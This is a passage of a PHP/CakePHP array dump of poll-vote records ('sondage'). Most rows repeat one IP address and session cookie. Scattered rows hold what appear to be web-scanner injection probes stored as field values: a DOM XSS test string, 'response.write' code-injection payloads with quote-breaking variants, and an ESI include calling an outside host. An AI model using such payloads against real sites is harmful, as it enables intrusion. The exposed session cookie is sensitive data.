'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4406 => array(
'id' => '4949',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4407 => array(
'id' => '4950',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4408 => array(
'id' => '4951',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4409 => array(
'id' => '4952',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4410 => array(
'id' => '4953',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4411 => array(
'id' => '4954',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4412 => array(
'id' => '4955',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4413 => array(
'id' => '4956',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4414 => array(
'id' => '4957',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4415 => array(
'id' => '4958',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4416 => array(
'id' => '4959',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4417 => array(
'id' => '4960',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4418 => array(
'id' => '4961',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4419 => array(
'id' => '4962',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4420 => array(
'id' => '4963',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4421 => array(
'id' => '4964',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4422 => array(
'id' => '4965',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4423 => array(
'id' => '4966',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4424 => array(
'id' => '4967',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4425 => array(
'id' => '4968',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4426 => array(
'id' => '4969',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4427 => array(
'id' => '4970',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4428 => array(
'id' => '4971',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4429 => array(
'id' => '4972',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4430 => array(
'id' => '4973',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4431 => array(
'id' => '4974',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4432 => array(
'id' => '4975',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4433 => array(
'id' => '4976',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4434 => array(
'id' => '4977',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4435 => array(
'id' => '4978',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4436 => array(
'id' => '4979',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4437 => array(
'id' => '4980',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4438 => array(
'id' => '4981',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4439 => array(
'id' => '4982',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4440 => array(
'id' => '4983',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4441 => array(
'id' => '4984',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4442 => array(
'id' => '4985',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4443 => array(
'id' => '4986',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4444 => array(
'id' => '4987',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4445 => array(
'id' => '4988',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4446 => array(
'id' => '4989',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4447 => array(
'id' => '4990',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4448 => array(
'id' => '4991',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4449 => array(
'id' => '4992',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4450 => array(
'id' => '4993',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4451 => array(
'id' => '4994',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4452 => array(
'id' => '4995',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4453 => array(
'id' => '4996',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4454 => array(
'id' => '4997',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4455 => array(
'id' => '4998',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4456 => array(
'id' => '4999',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4457 => array(
'id' => '5000',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4458 => array(
'id' => '5001',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4459 => array(
'id' => '5002',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4460 => array(
'id' => '5003',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4461 => array(
'id' => '5004',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4462 => array(
'id' => '5005',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4463 => array(
'id' => '5006',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4464 => array(
'id' => '5007',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4465 => array(
'id' => '5008',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4466 => array(
'id' => '5009',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4467 => array(
'id' => '5010',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4468 => array(
'id' => '5011',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4469 => array(
'id' => '5012',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4470 => array(
'id' => '5013',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4471 => array(
'id' => '5014',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4472 => array(
'id' => '5015',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4473 => array(
'id' => '5016',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4474 => array(
'id' => '5017',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4475 => array(
'id' => '5018',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4476 => array(
'id' => '5019',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4477 => array(
'id' => '5020',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4478 => array(
'id' => '5021',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4479 => array(
'id' => '5022',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4480 => array(
'id' => '5023',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4481 => array(
'id' => '5024',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4482 => array(
'id' => '5025',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4483 => array(
'id' => '5026',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4484 => array(
'id' => '5027',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4485 => array(
'id' => '5028',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4486 => array(
'id' => '5029',
'ip' => 'ddhI2lpO',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4487 => array(
'id' => '5030',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4488 => array(
'id' => '5031',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4489 => array(
'id' => '5032',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4490 => array(
'id' => '5033',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4491 => array(
'id' => '5034',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4492 => array(
'id' => '5035',
'ip' => 'fIG5oPym: ozHjiQHM',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4493 => array(
'id' => '5036',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4494 => array(
'id' => '5037',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4495 => array(
'id' => '5038',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4496 => array(
'id' => '5039',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4497 => array(
'id' => '5040',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4498 => array(
'id' => '5041',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4499 => array(
'id' => '5042',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4500 => array(
'id' => '5043',
'ip' => '194.34.233.72',
'ip1' => 'cmELhBPg',
'sondage_id' => '2'
),
(int) 4501 => array(
'id' => '5044',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4502 => array(
'id' => '5045',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4503 => array(
'id' => '5046',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4504 => array(
'id' => '5047',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4505 => array(
'id' => '5048',
'ip' => '194.34.233.72',
'ip1' => 'zx7xSKwr: 5UpNiJQP',
'sondage_id' => '2'
),
(int) 4506 => array(
'id' => '5049',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4507 => array(
'id' => '5050',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4508 => array(
'id' => '5051',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4509 => array(
'id' => '5052',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4510 => array(
'id' => '5053',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4511 => array(
'id' => '5054',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4512 => array(
'id' => '5055',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4513 => array(
'id' => '5056',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4514 => array(
'id' => '5057',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4515 => array(
'id' => '5058',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4516 => array(
'id' => '5059',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4517 => array(
'id' => '5060',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4518 => array(
'id' => '5061',
'ip' => '194.34.233.72',
'ip1' => '',
'sondage_id' => '2'
),
(int) 4519 => array(
'id' => '5062',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4520 => array(
'id' => '5063',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4521 => array(
'id' => '5064',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4522 => array(
'id' => '5065',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4523 => array(
'id' => '5066',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4524 => array(
'id' => '5067',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4525 => array(
'id' => '5068',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4526 => array(
'id' => '5069',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4527 => array(
'id' => '5070',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4528 => array(
'id' => '5071',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4529 => array(
'id' => '5072',
'ip' => '194.34.233.72',
'ip1' => 'response.write(9873503*9597463)',
'sondage_id' => '2'
),
(int) 4530 => array(
'id' => '5073',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4531 => array(
'id' => '5074',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4532 => array(
'id' => '5075',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4533 => array(
'id' => '5076',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4534 => array(
'id' => '5077',
'ip' => '194.34.233.72',
'ip1' => ''+response.write(9873503*9597463)+'',
'sondage_id' => '2'
),
(int) 4535 => array(
'id' => '5078',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4536 => array(
'id' => '5079',
'ip' => '194.34.233.72',
'ip1' => '"+response.write(9873503*9597463)+"',
'sondage_id' => '2'
),
(int) 4537 => array(
'id' => '5080',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4538 => array(
'id' => '5081',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4539 => array(
'id' => '5082',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4540 => array(
'id' => '5083',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4541 => array(
'id' => '5084',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4542 => array(
'id' => '5085',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4543 => array(
'id' => '5086',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4544 => array(
'id' => '5087',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4545 => array(
'id' => '5088',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4546 => array(
'id' => '5089',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4547 => array(
'id' => '5090',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4548 => array(
'id' => '5091',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4549 => array(
'id' => '5092',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4550 => array(
'id' => '5093',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4551 => array(
'id' => '5094',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4552 => array(
'id' => '5095',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4553 => array(
'id' => '5096',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4554 => array(
'id' => '5097',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4555 => array(
'id' => '5098',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4556 => array(
'id' => '5099',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 4557 => array(
'id' => '5100',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4558 => array(
'id' => '5101',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4559 => array(
'id' => '5102',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4560 => array(
'id' => '5103',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4561 => array(
'id' => '5104',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4562 => array(
'id' => '5105',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4563 => array(
'id' => '5106',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4564 => array(
'id' => '5107',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4565 => array(
'id' => '5108',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4566 => array(
'id' => '5109',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4567 => array(
'id' => '5110',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4568 => array(
'id' => '5111',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4569 => array(
'id' => '5112',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4570 => array(
'id' => '5113',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4571 => array(
'id' => '5114',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4572 => array(
'id' => '5115',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4573 => array(
'id' => '5116',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4574 => array(
'id' => '5117',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4575 => array(
'id' => '5118',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4576 => array(
'id' => '5119',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4577 => array(
'id' => '5120',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4578 => array(
'id' => '5121',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4579 => array(
'id' => '5122',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4580 => array(
'id' => '5123',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4581 => array(
'id' => '5124',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4582 => array(
'id' => '5125',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4583 => array(
'id' => '5126',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4584 => array(
'id' => '5127',
'ip' => '194.34.233.72',
